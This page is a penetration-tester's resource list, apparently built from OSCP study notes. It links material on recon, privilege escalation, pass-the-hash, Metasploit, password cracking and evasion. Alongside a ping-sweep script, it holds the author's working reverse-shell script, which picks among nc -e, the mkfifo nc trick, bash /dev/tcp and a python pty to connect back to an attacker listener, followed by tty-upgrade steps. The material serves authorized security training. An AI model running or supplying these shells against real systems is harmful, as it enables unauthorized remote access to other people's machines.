Disclaimer: Use this information only in a controlled manner and only on systems you have permission to use. Any illegal use is your responsibility, as is learning the laws in your country, state, province or county and abiding by them.
*Page under construction. Working on formatting and removing old links. A majority of these came from my OSCP notes and are a little old by now.
General Offensive Links
General Blogs
Site | Description |
| Interesting articles on exploits, reversing and other tradecraft. |
| Articles on shellcode, exploits, and Web attacks. |
General Knowledge
Site | Description |
| A site dedicated to the PTES testing methodology. If you are wondering what is involved and how an engagement flows, this is your site. |
| He covers a variety of pen testing topics, including "zero to hero" style courses, and discusses how to get into the industry. |
| A great site that is basically an encyclopedia of techniques. |
| A great resource for command syntax for common tools and techniques. |
| A great resource for many things pen testing: tool usage, various techniques, you name it, an article is probably here. |
Link Lists
Site | Description |
| One of the best lists of links I have found for pen testing. |
| Before HTB there was Vulnhub. This is a list of their recommended resources. A great list of resources for learning. |
| Jhaddix is one of the big influencers in the bug bounty space and an awesome instructor. This is his list of bookmarks. |
Exploits/Assembly
Exploit Dev
Site | Description |
| An older tutorial on writing a Windows buffer overflow. |
| A guide on cross-compiling code. Important if you are compiling an exploit for another nix system. |
| An older tutorial on writing an overflow. Very detailed description of the execution flow. |
| A great tool for seeing how C++ code translates to assembly instructions. |
| A blog that doesn't appear to have any current content, which is why it's not listed under blogs. But it has great posts on exploits and scripting. |
Web
Web App Hacking
Site | Description |
| Tons of content on XSS. |
| Lists the file types indexable by Google. Could be useful to know during recon activities. |
Bug Bounties
Site | Description |
| One of the top influencers in the bug bounty space. He does live recon, CTF walkthroughs, and explanation videos for web application hacking content. |
| One of the top influencers in the bug bounty space. She focuses on explanation videos for web application hacking content and bug bounties. |
| One of the top influencers in the bug bounty space. He does interviews with bug bounty hunters, talks about new tools, explains his bounties, tutorials on specific techniques, and talks about mental health. |
Intel Gathering
Open Source Intel (OSINT)
Site | Description |
| Contains vast information on Google Dorking. |
Network Hacking
Recon
Site | Description |
| If you are pivoting on a network, you don't always have nmap. These are options to do a ping sweep with some quick scripts. |
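An added example of the kind of sweep those links describe (my own script, not code from any of the linked pages): a /24 ping sweep using nothing but ping, awk and the shell, with one ping per host in the background so the whole sweep takes a few seconds. It assumes a prefix such as 10.11.1 and Linux iputils ping flags; the Windows cmd equivalent is in a comment.

```shell
#!/bin/sh
# Ping sweep for a /24 without nmap: only ping, awk and the shell are needed.
# Windows cmd equivalent (one line, from a foothold on a Windows host):
#   for /L %i in (1,1,254) do @ping -n 1 -w 200 10.11.1.%i | find "Reply"

# Print PREFIX.FROM .. PREFIX.TO one per line, e.g. expand_range 10.11.1 1 254
expand_range() {
  prefix=$1; from=${2:-1}; to=${3:-254}
  i=$from
  while [ "$i" -le "$to" ]; do
    echo "$prefix.$i"
    i=$((i + 1))
  done
}

# Read raw ping output on stdin and print each responding IP once.
# A reply looks like "64 bytes from 10.11.1.5: icmp_seq=1 ttl=64 time=0.1 ms",
# so take field 4 and strip the trailing colon; unreachable hosts never print
# a "bytes from" line, and the "PING x (x) 56(84) bytes of data." banner does
# not match either.
alive_from_ping() {
  awk '/bytes from/ { ip = $4; sub(/:$/, "", ip); if (!seen[ip]++) print ip }'
}

# Fire one echo request per host in parallel and wait for all of them.
# -c 1: one packet; -W 1: give up after one second (Linux; BSD/macOS use -t 1).
ping_sweep() {   # ping_sweep PREFIX [FROM] [TO]
  for ip in $(expand_range "$@"); do
    ping -c 1 -W 1 "$ip" 2>/dev/null &
  done
  wait
}

# Usage: sh sweep.sh 10.11.1          (sweeps 10.11.1.1-254, prints live hosts)
if [ -n "${1:-}" ]; then
  ping_sweep "$@" | alive_from_ping | sort -t . -k 4 -n
fi
```

Pipe the output straight into whatever you have on the box for port checks (bash's /dev/tcp or a static nmap binary you uploaded). Hosts that filter ICMP will be missed, which is the usual caveat for any ping sweep.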
File Transfer
Site | Description |
| One of my favorite ways of transferring files in a CTF environment. |
Privilege Escalation
Site | Description |
| One of my favorite Windows privesc resources. It doesn't just have techniques but rather walks you through the process. |
| A classic resource for Linux privesc. Used this extensively in OSCP. |
Lateral Movement
Site | Description |
| A detailed explanation of how pass the hash works. |
| An explanation of how to use PTH to get an RDP session. |
| A great resource on pivoting in an environment with SSH. |
Shells
Site | Description |
| A great cheat sheet covering different ways to get a reverse shell. One of my favorite resources on this topic. |
| Cheatsheet for spawning tty shells. |
| Exactly what it says, getting a netcat shell without using the 'e' flag. I have used this in various labs and CTFs on systems that didn't support 'e'. |
| You can do some cool stuff with SSH. This resource covers many of those things, like forwarding and proxying. |
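An added example pulling together the reverse shell, tty and "no -e" entries above (my own script, not code from any of the linked pages). It checks whether the target's nc actually accepts -e, falls back to the mkfifo trick or to bash/python when it doesn't, and prints the one-liner to paste. The listener address 10.11.0.4:4444 in the comments is an assumption; the -e detection is a usage-text heuristic.

```shell
#!/bin/sh
# Reverse shells for a box whose nc has no -e, plus a check of what is present.
# HOST and PORT are the attacker's listener (e.g. nc -lvnp 4444 on 10.11.0.4).

# Does this nc accept -e? netcat-traditional and ncat do; OpenBSD's nc does not.
# Heuristic: every nc prints usage on -h, and only the -e variants mention "-e".
nc_supports_e() {
  command -v nc >/dev/null 2>&1 || return 1
  nc -h 2>&1 | grep -q -- '-e[ ,]'
}

# The FIFO trick: nc only wires its own stdin/stdout to the socket, so bytes
# from the attacker are written into a FIFO, sh reads the FIFO as its stdin,
# and sh's stdout/stderr are piped back into nc. Without the FIFO there is no
# way to feed the shell's input from the same connection.
fifo_one_liner() {   # fifo_one_liner HOST PORT  -> prints the command to paste
  printf 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc %s %s > /tmp/f\n' "$1" "$2"
}

# Fallbacks that need no nc at all.
bash_one_liner() {     # bash opens a TCP socket via /dev/tcp
  printf 'bash -i >& /dev/tcp/%s/%s 0>&1\n' "$1" "$2"
}
python_one_liner() {   # python with a pty, so the shell arrives already interactive
  printf "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"%s\",%s));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/sh\")'\n" "$1" "$2"
}

# Run ON the target (from a webshell or other limited shell): prints the best
# available one-liner for this box, or fails if none of the transports exist.
pick_reverse_shell() {   # pick_reverse_shell HOST PORT
  host=$1; port=$2
  if nc_supports_e; then
    printf 'nc -e /bin/sh %s %s\n' "$host" "$port"
  elif command -v nc >/dev/null 2>&1; then
    fifo_one_liner "$host" "$port"
  elif command -v bash >/dev/null 2>&1; then
    bash_one_liner "$host" "$port"
  elif command -v python3 >/dev/null 2>&1; then
    python_one_liner "$host" "$port"
  else
    echo "no nc, bash or python3 found; try perl/php/socat" >&2
    return 1
  fi
}

# Once the dumb shell is in, upgrade it to a full tty. On the target:
#   python3 -c 'import pty; pty.spawn("/bin/bash")'
# then Ctrl-Z, and on the attacker side:
#   stty raw -echo; fg
#   export TERM=xterm; stty rows 50 cols 200

# Usage on the target: sh shells.sh 10.11.0.4 4444
if [ $# -eq 2 ]; then
  pick_reverse_shell "$1" "$2"
fi
```

The FIFO one-liner leaves /tmp/f behind; remove it when you are done. The python fallback is the one to reach for first if it is there, since it skips the separate tty upgrade step.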
Metasploit/Meterpreter
https://www.offensive-security.com/metasploit-unleashed/ - Metasploit Unleashed
https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/ - Metasploit Commands
https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/ - Upgrade Metasploit shells
http://netsec.ws/?p=262 - Converting Metasploit Modules to standalone
https://www.offensive-security.com/metasploit-unleashed/portfwd/ - Port forwarding with Metasploit
https://cyberarms.wordpress.com/2013/09/22/recovering-plain-text-passwords-with-metasploit-and-mimikatz/ - Mimikatz/Metasploit
https://www.offensive-security.com/metasploit-unleashed/mimikatz/ - Meterpreter Mimikatz
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit - Metasploit Reverse Shell
https://www.rapid7.com/db/modules/auxiliary/scanner/smtp/smtp_version - SMTP Banner grabbing
https://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot - Pivot with Meterpreter
https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/ - Metasploit Post Modules
https://www.offensive-security.com/metasploit-unleashed/Pivoting/ - Pivot with Metasploit
https://pentestlab.blog/2012/07/27/attacking-mysql-with-metasploit/ - MySQL attack with Metasploit
https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/ - MSSQL Hunting with Metasploit
https://sathisharthars.com/2014/07/07/evade-windows-firewall-by-ssh-tunneling-using-metasploit/ - Windows Firewall Evasion
https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/ - Msfvenom binary trojan
https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/ - Client-side exploits MSF
http://netsec.ws/?p=331 - Msfvenom payload cheatsheet
https://www.offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/ - Writing Meterpreter scripts
https://www.offensive-security.com/metasploit-unleashed/john-ripper/ - John w/Metasploit
Passwords
https://wiki.skullsecurity.org/Passwords - Dictionaries/Leaks/Misc
https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/ - ncrack, hydra, and medusa
http://foofus.net/goons/jmk/medusa/medusa.html - Medusa
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass - Mimikatz
Database Hacking
https://www.binarytides.com/sqlmap-hacking-tutorial/ - Sqlmap guide
http://digitalforensicstips.com/2013/01/telling-sqlmap-to-try-harder/ - Sqlmap guide
http://sqlzoo.net/wiki/SQL_Tutorial - SQL Tutorial
https://www.trustwave.com/Resources/SpiderLabs-Blog/Sqlmap-Tricks-for-Advanced-SQL-Injection/ - Sqlmap Tricks
Evasion Techniques
https://www.veil-framework.com/guidesvideos/ - Veil Framework video guides